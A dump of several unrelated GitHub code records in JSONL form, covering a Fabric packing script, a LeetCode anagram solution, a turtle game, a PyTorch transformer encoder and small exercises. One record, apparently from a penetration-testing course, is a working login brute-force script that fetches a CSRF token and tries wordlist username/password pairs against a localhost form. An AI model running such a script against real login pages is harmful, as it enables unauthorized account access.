fabric.api import hide\nfrom datetime import datetime\n\n\ndef do_pack():\n \"\"\"\n Create folder backup with date and tgz extension\n \"\"\"\n print(\"Packing web_static to versions/web_static_%s.tgz\" %\n (datetime.now().strftime('%Y%m%d%H%M%S')))\n\n with hide('running'):\n versions_dir = local('mkdir -p versions')\n\n tar = local('tar -cvzf versions/web_static_%s.tgz web_static/' %\n (datetime.now().strftime('%Y%m%d%H%M%S')))\n\n with hide('running'):\n file_size = local('wc -c < versions/web_static_{}.tgz'.\n format(datetime.now().strftime('%Y%m%d%H%M%S')),\n capture=True)\n\n print(\"web_static packed: versions/web_static_{:s}.tgz -> {:}Bytes\".\n format(datetime.now().strftime('%Y%m%d%H%M%S'), file_size))\n","repo_name":"Virteip/AirBnB_clone_v2","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"17448220869","text":"# https://leetcode.com/problems/group-anagrams/\n\"\"\"\nGiven an array of strings strs, group the anagrams together.\nYou can return the answer in any order.An Anagram is a word or phrase\nformed by rearranging the letters of a different word or phrase,\ntypically using all the original letters exactly once.\n\nExample 1:\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\n\nExample 2:\nInput: strs = [\"\"]\nOutput: [[\"\"]]\n\nExample 3:\nInput: strs = [\"a\"]\nOutput: [[\"a\"]]\n\nConstraints:\n1 <= strs.length <= 104\n0 <= strs[i].length <= 100\nstrs[i] consists of lowercase English letters.\n\"\"\"\n\n\"\"\"\nA naive solution is to first have a check_anagram function and then\nstart appending strs to an answer list, while checking if the current str\nis anagram with any of the existing groups of anagrams. The complexity\nwill be O(number of groups * total strings in the input)\n\nA faster approach is O(n) and uses hashmap to determine which group\nto add the current string to. The key of the hashmap is cleverly formed\nusing the count of different characters that appear in the str. Since\nwe know the string is only made of lowercase letters, we can have a static\narray of length 26 (initialized to 0), traverse the str and increase the\ncorresponding character counters by 1, join all the 26 numbers by an _\nand the resulting str is the key to which we will append all the anagrams.\nIn this approach, we only traverse the input list once and insertion to\nthe map is always O(1) so for all elements it still O(n) making the entire\nsolution O(n).\n\"\"\"\n\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n # convert each string to a hash representing count of characters\n anagram_hash = {}\n for i in range(len(strs)):\n char_count_arr = [0] * 26\n for j in range(len(strs[i])):\n char_count_arr[ord(strs[i][j]) - ord(\"a\")] += 1\n\n curr_key = \"_\".join(map(str, char_count_arr))\n try:\n anagram_hash[curr_key].append(strs[i])\n except KeyError:\n anagram_hash[curr_key] = [strs[i]]\n\n ans = []\n # convert to ans\n for k in anagram_hash:\n ans.append(anagram_hash[k])\n\n # all done\n return ans\n","repo_name":"DragonWarrior15/programming-questions","sub_path":"hashmap/anagram_groups.py","file_name":"anagram_groups.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"31490771293","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor('black')\nscreen.tracer(0)\n\ntim = Player()\ncar_manager = CarManager()\nscoreboard = Scoreboard()\n\nscreen.listen()\nscreen.onkeypress(key='Up', fun=tim.move_up)\nscreen.onkeypress(key='Down', fun=tim.move_down)\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n\n car_manager.create_cars()\n car_manager.move_cars()\n\n # detect collision with car\n for car in car_manager.cars:\n if car.distance(tim) < 20:\n scoreboard.game_over()\n game_is_on = False\n\n # detect successful crossing\n if tim.is_at_finish_line():\n car_manager.level_up()\n scoreboard.increase_level()\n tim.goto_start()\n\nscreen.exitonclick()\n","repo_name":"subsangam/100DaysOfCode-Python","sub_path":"Day23/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18951909265","text":"import requests\n# import hashlib\nfrom bs4 import BeautifulSoup\n\nbase_url = 'http://localhost:6969'\nlogin_url = f'{base_url}/login.php'\n\nwordlist_file = 'wordlist.txt'\nwordlist = []\n\nsession = None\nlogin_action_url = ''\ncsrf = ''\n\ndef main():\n global session, csrf, login_action_url\n\n init_wordlist()\n\n session = requests.Session()\n\n response = session.get(login_url)\n soup = BeautifulSoup(response.content, 'html.parser')\n \n # get action attribute from login form\n # can definitely be hard inputted, but you can do it like this if you want to automate this process\n login_action = soup.find('form')['action']\n login_action_url = f'{base_url}{login_action}'\n\n csrf = soup.find(\"input\", {'name': '_token'})['value']\n\n result = brute_force()\n\n if result == None:\n print('Brute force failed')\n else:\n print('\\nBrute force succeeded')\n print(f'Username: {result[0]}, password: {result[1]}')\n\ndef brute_force():\n for word1 in wordlist:\n for word2 in wordlist:\n payload = {\n 'username': word1,\n 'password': word2,\n '_token': csrf\n }\n\n # if the password is encrypted in the front end\n \n # payload = {\n # 'username': word1,\n # 'password': hashlib.md5(word2.encode()).hexdigest(),\n # '_token': csrf\n # }\n\n response = session.post(login_action_url, data=payload)\n\n if response.url == login_url:\n # auth failed\n print(f'Combination of {word1} and {word2} failed')\n else:\n # auth succeeded\n print(f'Combination of {word1} and {word2} succeeded')\n return word1, word2\n \n return None\n\ndef init_wordlist():\n global wordlist\n\n filelist = open(wordlist_file, 'r')\n for file in filelist:\n wordlist.append(file.strip(\"\\n\"))\n filelist.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"sannaggi/ProgPenTest","sub_path":"pert10/pert10.py","file_name":"pert10.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72639401744","text":"import random\n\ndef typoglycemasize(sentence):\n\tparted = sentence.split(' ')\n\tfor i in range(len(parted)):\n\t\tif(len(parted[i]) <= 3):\n\t\t\tcontinue\n\t\tbegin = parted[i][0]\n\t\tmid = list(parted[i][1:-1])\n\t\trandom.shuffle(mid)\n\t\tmid = ''.join(mid)\n\t\tend = parted[i][-1]\n\t\tparted[i] = begin+mid+end\n\treturn ' '.join(parted)\n\t\nprint(typoglycemasize(input('Gimme a sentence: ')))","repo_name":"cman131/CodeChallenges","sub_path":"Typoglycema.py","file_name":"Typoglycema.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"540615834","text":"import torch\r\nimport numpy as np\r\nfrom torch import nn\r\nimport math\r\nimport torch.nn.functional as F\r\n\r\nfrom reformer_pytorch import LSHSelfAttention\r\nfrom reformer_pytorch import LSHAttention\r\n\r\nfrom math import sqrt\r\nfrom utils.masking import TriangularCausalMask, ProbMask\r\nimport time\r\n\r\nclass SkipConnection(nn.Module):\r\n\r\n def __init__(self, module):\r\n super(SkipConnection, self).__init__()\r\n self.module = module\r\n\r\n def forward(self, input):\r\n return input + self.module(input)\r\n\r\n\r\nclass MultiHeadAttention(nn.Module):\r\n def __init__(\r\n self,\r\n n_heads,\r\n input_dim,\r\n embed_dim,\r\n val_dim=None,\r\n key_dim=None\r\n ):\r\n super(MultiHeadAttention, self).__init__()\r\n\r\n if val_dim is None:\r\n val_dim = embed_dim // n_heads\r\n if key_dim is None:\r\n key_dim = val_dim\r\n\r\n self.n_heads = n_heads\r\n self.input_dim = input_dim\r\n self.embed_dim = embed_dim\r\n self.val_dim = val_dim\r\n self.key_dim = key_dim\r\n\r\n self.norm_factor = 1 / math.sqrt(key_dim) # See Attention is all you need\r\n\r\n self.W_query = nn.Parameter(torch.Tensor(n_heads, input_dim, key_dim))\r\n self.W_key = nn.Parameter(torch.Tensor(n_heads, input_dim, key_dim))\r\n self.W_val = nn.Parameter(torch.Tensor(n_heads, input_dim, val_dim))\r\n\r\n self.W_out = nn.Parameter(torch.Tensor(n_heads, val_dim, embed_dim))\r\n self.dropout = nn.Dropout(0.5)\r\n\r\n self.init_parameters()\r\n\r\n def init_parameters(self):\r\n\r\n for param in self.parameters():\r\n stdv = 1. / math.sqrt(param.size(-1))\r\n param.data.uniform_(-stdv, stdv)\r\n\r\n def forward(self, q, W_query, W_key, W_val, W_out, h=None, mask=None):\r\n \"\"\"\r\n\r\n :param q: queries (batch_size, n_query, input_dim)\r\n :param h: data (batch_size, graph_size, input_dim)\r\n :param mask: mask (batch_size, n_query, graph_size) or viewable as that (i.e. can be 2 dim if n_query == 1)\r\n Mask should contain 1 if attention is not possible (i.e. mask is negative adjacency)\r\n :return:\r\n \"\"\"\r\n if h is None:\r\n h = q # compute self-attention\r\n\r\n # h should be (batch_size, graph_size, input_dim)\r\n batch_size, graph_size, input_dim = h.size()\r\n n_query = q.size(1)\r\n assert q.size(0) == batch_size\r\n assert q.size(2) == input_dim\r\n assert input_dim == self.input_dim, \"Wrong embedding dimension of input\"\r\n\r\n hflat = h.contiguous().view(-1, input_dim)\r\n qflat = q.contiguous().view(-1, input_dim)\r\n\r\n # last dimension can be different for keys and values\r\n shp = (self.n_heads, batch_size, graph_size, -1)\r\n shp_q = (self.n_heads, batch_size, n_query, -1)\r\n\r\n # Calculate queries, (n_heads, n_query, graph_size, key/val_size)\r\n Q = torch.matmul(qflat, W_query).view(shp_q)\r\n # Calculate keys and values (n_heads, batch_size, graph_size, key/val_size)\r\n K = torch.matmul(hflat, W_key).view(shp)\r\n V = torch.matmul(hflat, W_val).view(shp)\r\n\r\n # Calculate compatibility (n_heads, batch_size, n_query, graph_size)\r\n compatibility = self.norm_factor * torch.matmul(Q, K.transpose(2, 3))\r\n\r\n # Optionally apply mask to prevent attention\r\n if mask is not None:\r\n mask = mask.view(1, batch_size, n_query, graph_size).expand_as(compatibility)\r\n compatibility[mask] = -np.inf\r\n\r\n attn = torch.softmax(compatibility, dim=-1)\r\n # attn = self.dropout(attn)\r\n\r\n # If there are nodes with no neighbours then softmax returns nan so we fix them to 0\r\n if mask is not None:\r\n attnc = attn.clone()\r\n attnc[mask] = 0\r\n attn = attnc\r\n\r\n heads = torch.matmul(attn, V)\r\n\r\n out = torch.mm(\r\n heads.permute(1, 2, 0, 3).contiguous().view(-1, self.n_heads * self.val_dim),\r\n W_out.view(-1, self.embed_dim)\r\n ).view(batch_size, n_query, self.embed_dim)\r\n\r\n # Alternative:\r\n # headst = heads.transpose(0, 1) # swap the dimensions for batch and heads to align it for the matmul\r\n # # proj_h = torch.einsum('bhni,hij->bhnj', headst, self.W_out)\r\n # projected_heads = torch.matmul(headst, self.W_out)\r\n # out = torch.sum(projected_heads, dim=1) # sum across heads\r\n\r\n # Or:\r\n # out = torch.einsum('hbni,hij->bnj', heads, self.W_out)\r\n\r\n return out, attn\r\n\r\n\r\nclass Normalization(nn.Module):\r\n\r\n def __init__(self, embed_dim, normalization='batch'):\r\n super(Normalization, self).__init__()\r\n\r\n normalizer_class = {\r\n 'batch': nn.BatchNorm1d,\r\n 'instance': nn.InstanceNorm1d,\r\n 'layer': nn.LayerNorm\r\n }.get(normalization, None)\r\n self.normalizer = normalizer_class(embed_dim)\r\n self.embed_dim = embed_dim\r\n\r\n # Normalization by default initializes affine parameters with bias 0 and weight unif(0,1) which is too large!\r\n # self.init_parameters()\r\n\r\n def init_parameters(self):\r\n\r\n for name, param in self.named_parameters():\r\n stdv = 1. / math.sqrt(param.size(-1))\r\n param.data.uniform_(-stdv, stdv)\r\n\r\n def forward(self, input, weights, bias):\r\n\r\n if isinstance(self.normalizer, nn.BatchNorm1d):\r\n return F.batch_norm(input.view(-1, input.size(-1)), running_mean=None, running_var=None, weight=weights, bias=bias, training=True).view(*input.size())\r\n elif isinstance(self.normalizer, nn.InstanceNorm1d):\r\n return F.instance_norm(input.permute(0, 2, 1), running_mean=None, running_var=None, weight=weights, bias=bias, training=True).permute(0, 2, 1)\r\n elif isinstance(self.normalizer, nn.LayerNorm):\r\n return F.layer_norm(input, (self.embed_dim,), weights, bias)\r\n else:\r\n assert self.normalizer is None, \"Unknown normalizer type\"\r\n return input\r\n\r\n\r\nclass AttentionLayer(nn.Module):\r\n def __init__(self, attention, d_model, n_heads, \r\n d_keys=None, d_values=None, mix=False):\r\n super(AttentionLayer, self).__init__()\r\n\r\n d_keys = d_keys or (d_model//n_heads)\r\n d_values = d_values or (d_model//n_heads)\r\n\r\n self.inner_attention = attention\r\n self.query_projection = nn.Linear(d_model, d_keys * n_heads)\r\n self.key_projection = nn.Linear(d_model, d_keys * n_heads)\r\n self.value_projection = nn.Linear(d_model, d_values * n_heads)\r\n self.out_projection = nn.Linear(d_values * n_heads, d_model)\r\n self.n_heads = n_heads\r\n self.mix = mix\r\n\r\n def forward(self, queries, keys, values, query_weight, query_bias, key_weight, key_bias, value_weight, value_bias, out_weight, out_bias, attn_mask):\r\n B, L, _ = queries.shape\r\n _, S, _ = keys.shape\r\n H = self.n_heads\r\n # queries = self.query_projection(queries).view(B, L, H, -1)\r\n # keys = self.key_projection(keys).view(B, S, H, -1)\r\n # values = self.value_projection(values).view(B, S, H, -1)\r\n queries = F.linear(queries, query_weight, query_bias).view(B, L, H, -1)\r\n keys = F.linear(keys, key_weight, key_bias).view(B, S, H, -1)\r\n values = F.linear(values, value_weight, value_bias).view(B, S, H, -1)\r\n start_time = time.time()\r\n out, attn = self.inner_attention(\r\n queries,\r\n keys,\r\n values,\r\n attn_mask\r\n )\r\n print(time.time()-start_time)\r\n if self.mix:\r\n out = out.transpose(2,1).contiguous()\r\n out = out.view(B, L, -1)\r\n # out = self.out_projection(out)\r\n out = F.linear(out, out_weight, out_bias)\r\n\r\n return out\r\n\r\n\r\n# class MultiHeadAttentionLayer(nn.Module):\r\n\r\n# def __init__(\r\n# self,\r\n# n_heads,\r\n# embed_dim,\r\n# feed_forward_hidden=512,\r\n# normalization='batch',\r\n# ):\r\n# super(MultiHeadAttentionLayer, self).__init__()\r\n# self.attn = MultiHeadAttention(\r\n# n_heads,\r\n# input_dim=embed_dim,\r\n# embed_dim=embed_dim\r\n# )\r\n \r\n# self.norm1 = Normalization(embed_dim, normalization)\r\n# self.ff = nn.Sequential(\r\n# nn.Linear(embed_dim, feed_forward_hidden),\r\n# nn.ReLU(),\r\n# nn.Linear(feed_forward_hidden, embed_dim)\r\n# ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n \r\n# self.norm2 = Normalization(embed_dim, normalization)\r\n \r\n# def forward(self, x):\r\n# x = self.attn(x)\r\n# x = self.norm1(x)\r\n# x = self.ff(x)\r\n# x = self.norm2(x)\r\n# return x\r\n\r\n# def functional_forward(self, h, params):\r\n \r\n # h = h + self.attn(h, params[f'embedder.layer1_multi.W_query'], params[f'embedder.layer1_multi.W_key'], params[f'embedder.layer1_multi.W_val'], params[f'embedder.layer1_multi.W_out'])\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm1.normalizer.weight'], params[f'embedder.layer1_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], params[f'embedder.layer1_seq.2.weight'], params[f'embedder.layer1_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm2.normalizer.weight'], params[f'embedder.layer1_norm2.normalizer.bias']) \r\n\r\n\r\n#### positional encoding ####\r\nclass PositionalEncoding(nn.Module):\r\n def __init__(self, d_model, max_len=1000):\r\n super(PositionalEncoding, self).__init__()\r\n self.dropout = nn.Dropout(0.5)\r\n pe = torch.zeros(max_len, d_model)\r\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\r\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\r\n pe[:, 0::2] = torch.sin(position * div_term)\r\n pe[:, 1::2] = torch.cos(position * div_term)\r\n pe = pe.unsqueeze(0)\r\n # pe.requires_grad = False\r\n self.register_buffer('pe', pe)\r\n\r\n def forward(self, x):\r\n return self.dropout(x + self.pe[:, :x.size(1)])\r\n \r\n\r\nclass MultiHeadAttentionLayer(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n n_heads,\r\n embed_dim,\r\n feed_forward_hidden=512,\r\n normalization='batch',\r\n ):\r\n super(MultiHeadAttentionLayer, self).__init__()\r\n\r\n self.embed_dim = embed_dim\r\n self.self_attn = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n \r\n self.dropout = nn.Dropout(0.5)\r\n self.norm1 = Normalization(embed_dim, normalization)\r\n # self.norm1 = nn.LayerNorm(embed_dim)\r\n self.ff = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n \r\n # self.norm2 = nn.LayerNorm(embed_dim)\r\n self.norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.feed_forward_hidden = feed_forward_hidden\r\n \r\n def forward(self, x):\r\n x, attn = self.self_attn(x)\r\n x = x+ self.dropout(x)\r\n x = self.norm1(x)\r\n x = self.ff(x)\r\n x = self.norm2(x)\r\n return x\r\n\r\n def functional_forward(self, x, params, layer_num):\r\n\r\n # x2 = self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out'])\r\n x, attn = self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out'])\r\n x = x + self.dropout(x)\r\n x = self.norm1(x, params[f'embedder.layer{layer_num}.norm1.normalizer.weight'], params[f'embedder.layer{layer_num}.norm1.normalizer.bias'])\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm1.weight'], params[f'embedder.layer{layer_num}.norm1.bias'])\r\n\r\n x = x + SeqFunction(x, params[f'embedder.layer{layer_num}.ff.0.weight'], params[f'embedder.layer{layer_num}.ff.0.bias'], params[f'embedder.layer{layer_num}.ff.2.weight'], params[f'embedder.layer{layer_num}.ff.2.bias'], self.feed_forward_hidden)\r\n x = x + self.dropout(x)\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm2.weight'], params[f'embedder.layer{layer_num}.norm2.bias'])\r\n x = self.norm2(x, params[f'embedder.layer{layer_num}.norm2.normalizer.weight'], params[f'embedder.layer{layer_num}.norm2.normalizer.bias'])\r\n \r\n return x, attn\r\n\r\n \r\n \r\ndef SeqFunction(input, weight1, bias1, weight2, bias2, feed_forward_hidden):\r\n if feed_forward_hidden > 0:\r\n x = F.linear(input, weight1, bias1)\r\n x = F.relu(x)\r\n x = F.linear(x, weight2, bias2)\r\n else:\r\n x = F.linear(input, weight1, bias1)\r\n \r\n return x\r\n\r\n\r\n\r\nclass Transformer(nn.Module):\r\n def __init__(\r\n self,\r\n n_heads,\r\n embed_dim,\r\n n_layers,\r\n node_dim=None,\r\n normalization='batch',\r\n feed_forward_hidden=512\r\n ):\r\n super(Transformer, self).__init__()\r\n\r\n self.feed_forward_hidden = feed_forward_hidden\r\n\r\n self.n_layers = n_layers\r\n # self.layers = nn.Sequential(*(\r\n # MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n # for _ in range(n_layers)\r\n # ))\r\n\r\n self.layer1 = MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n self.layer2 = MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n self.layer3 = MultiHeadAttentionLayer(n_heads, embed_dim, feed_forward_hidden, normalization)\r\n\r\n '''\r\n self.layer1_multi = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n self.layer1_norm1 = Normalization(embed_dim, normalization)\r\n self.layer1_seq = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n self.layer1_norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.layer2_multi = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n self.layer2_norm1 = Normalization(embed_dim, normalization)\r\n self.layer2_seq = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n self.layer2_norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.layer3_multi = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n self.layer3_norm1 = Normalization(embed_dim, normalization)\r\n self.layer3_seq = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n self.layer3_norm2 = Normalization(embed_dim, normalization)\r\n '''\r\n\r\n\r\n\r\n def forward(self, x):\r\n\r\n h = x\r\n\r\n h, attn1 = self.layer1(h)\r\n h, attn2 = self.layer2(h)\r\n h, attn3 = self.layer3(h)\r\n\r\n return h, attn3\r\n\r\n # def functional_forward(self, x, params, mask=None):\r\n\r\n # assert mask is None, \"TODO mask not yet supported!\"\r\n\r\n # # Batch multiply to get initial embeddings of nodes\r\n # h = F.linear(x.view(-1, x.size(-1)), params[f'embedder.init_embed.weight'], params[f'embedder.init_embed.bias']).view(*x.size()[:2], -1) if self.init_embed is not None else x\r\n\r\n # h = h + self.layer1_multi(h, params[f'embedder.layer1_multi.W_query'], params[f'embedder.layer1_multi.W_key'], params[f'embedder.layer1_multi.W_val'], params[f'embedder.layer1_multi.W_out'])\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm1.normalizer.weight'], params[f'embedder.layer1_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], params[f'embedder.layer1_seq.2.weight'], params[f'embedder.layer1_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer1_seq.0.weight'], params[f'embedder.layer1_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer1_norm1(h, params[f'embedder.layer1_norm2.normalizer.weight'], params[f'embedder.layer1_norm2.normalizer.bias'])\r\n\r\n\r\n # h = h + self.layer2_multi(h, params[f'embedder.layer2_multi.W_query'], params[f'embedder.layer2_multi.W_key'], params[f'embedder.layer2_multi.W_val'], params[f'embedder.layer2_multi.W_out'])\r\n # h = self.layer2_norm1(h, params[f'embedder.layer2_norm1.normalizer.weight'], params[f'embedder.layer2_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer2_seq.0.weight'], params[f'embedder.layer2_seq.0.bias'], params[f'embedder.layer2_seq.2.weight'], params[f'embedder.layer2_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer2_seq.0.weight'], params[f'embedder.layer2_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer2_norm1(h, params[f'embedder.layer2_norm2.normalizer.weight'], params[f'embedder.layer2_norm2.normalizer.bias'])\r\n\r\n\r\n # h = h + self.layer3_multi(h, params[f'embedder.layer3_multi.W_query'], params[f'embedder.layer3_multi.W_key'], params[f'embedder.layer3_multi.W_val'], params[f'embedder.layer3_multi.W_out'])\r\n # h = self.layer3_norm1(h, params[f'embedder.layer3_norm1.normalizer.weight'], params[f'embedder.layer3_norm1.normalizer.bias'])\r\n # if self.feed_forward_hidden > 0:\r\n # h = h + SeqFunction(h, params[f'embedder.layer3_seq.0.weight'], params[f'embedder.layer3_seq.0.bias'], params[f'embedder.layer3_seq.2.weight'], params[f'embedder.layer3_seq.2.bias'], self.feed_forward_hidden)\r\n # else:\r\n # h = h + SeqFunction(h, params[f'embedder.layer3_seq.0.weight'], params[f'embedder.layer3_seq.0.bias'], self.feed_forward_hidden)\r\n # h = self.layer3_norm1(h, params[f'embedder.layer3_norm2.normalizer.weight'], params[f'embedder.layer3_norm2.normalizer.bias'])\r\n\r\n # return (\r\n # h, # (batch_size, graph_size, embed_dim)\r\n # h.mean(dim=1), # average to get embedding of graph, (batch_size, embed_dim)\r\n # )\r\n \r\n def functional_forward(self, x, params):\r\n\r\n\r\n # Batch multiply to get initial embeddings of nodes\r\n h = x\r\n\r\n h, attn1 = self.layer1.functional_forward(h, params, layer_num = 1)\r\n h, attn2 = self.layer2.functional_forward(h, params, layer_num = 2)\r\n h, attn3 = self.layer3.functional_forward(h, params, layer_num = 3)\r\n\r\n return h, attn3 # (batch_size, graph_size, embed_dim)\r\n \r\n \r\nclass MultiHeadAttentionLayer1(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n n_heads,\r\n embed_dim,\r\n feed_forward_hidden=512,\r\n normalization='batch',\r\n ):\r\n super(MultiHeadAttentionLayer1, self).__init__()\r\n\r\n self.embed_dim = embed_dim\r\n self.self_attn = MultiHeadAttention(\r\n n_heads,\r\n input_dim=embed_dim,\r\n embed_dim=embed_dim\r\n )\r\n \r\n self.dropout = nn.Dropout(0.5)\r\n self.norm1 = Normalization(embed_dim, normalization)\r\n # self.norm1 = nn.LayerNorm(embed_dim)\r\n self.ff = nn.Sequential(\r\n nn.Linear(embed_dim, feed_forward_hidden),\r\n nn.ReLU(),\r\n nn.Linear(feed_forward_hidden, embed_dim)\r\n ) if feed_forward_hidden > 0 else nn.Linear(embed_dim, embed_dim)\r\n \r\n # self.norm2 = nn.LayerNorm(embed_dim)\r\n self.norm2 = Normalization(embed_dim, normalization)\r\n\r\n self.feed_forward_hidden = feed_forward_hidden\r\n \r\n def forward(self, x):\r\n x = x+ self.dropout(self.self_attn(x))\r\n x = self.norm1(x)\r\n x = self.ff(x)\r\n x = self.norm2(x)\r\n return x\r\n\r\n def functional_forward(self, x, params, layer_num):\r\n\r\n # x2 = self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out'])\r\n x = x + self.dropout(self.self_attn(x, params[f'embedder.layer{layer_num}.self_attn.W_query'], params[f'embedder.layer{layer_num}.self_attn.W_key'], params[f'embedder.layer{layer_num}.self_attn.W_val'], params[f'embedder.layer{layer_num}.self_attn.W_out']))\r\n x = self.norm1(x, params[f'embedder.layer{layer_num}.norm1.normalizer.weight'], params[f'embedder.layer{layer_num}.norm1.normalizer.bias'])\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm1.weight'], params[f'embedder.layer{layer_num}.norm1.bias'])\r\n\r\n x = x + SeqFunction(x, params[f'embedder.layer{layer_num}.ff.0.weight'], params[f'embedder.layer{layer_num}.ff.0.bias'], params[f'embedder.layer{layer_num}.ff.2.weight'], params[f'embedder.layer{layer_num}.ff.2.bias'], self.feed_forward_hidden)\r\n x = x + self.dropout(x)\r\n # x = F.layer_norm(x, (self.embed_dim,), params[f'embedder.layer{layer_num}.norm2.weight'], params[f'embedder.layer{layer_num}.norm2.bias'])\r\n x = self.norm2(x, params[f'embedder.layer{layer_num}.norm2.normalizer.weight'], params[f'embedder.layer{layer_num}.norm2.normalizer.bias'])\r\n \r\n return x\r\n","repo_name":"zhazhagui/AnesFormer","sub_path":"nets/graph_encoder_meta.py","file_name":"graph_encoder_meta.py","file_ext":"py","file_size_in_byte":23104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38659215104","text":"from collections import defaultdict\nimport sys,time\n\ndef multiply(n):\n\treturn (n*10)\n\ndef outer(n):\n\tcache = defaultdict()\t\n\tdef quick():\t\t\t\t\n\t\tif n not in cache:\n\t\t\tprint(\"MISS\")\n\t\t\tresult = multiply(n)\n\t\t\tcache[n] = result\t\t\n\t\t\treturn result\n\t\telse:\n\t\t\treturn cache[n]\n\t\n\treturn quick\n\nfor i in range(0,33000,299):\n\n\tmyFunc = outer(3)\n\tprint(myFunc())\n\nprint(\"DONE CACHING\")\ntime.sleep(2)\n\nfor i in range(0,33000,299):\n\tprint(quick(i)%25)\n\n'''\n# Output to File : \n\norig_stdout = sys.stdout\nf = open('out.txt', 'w')\nsys.stdout = f\t\t\n\t\nprint(quick(999))\nprint(quick(999))\n\n# Output to File :\nsys.stdout = orig_stdout\nf.close()\n'''\n","repo_name":"tuhiniris/Advanced-JavaScript-Codes","sub_path":"Faster 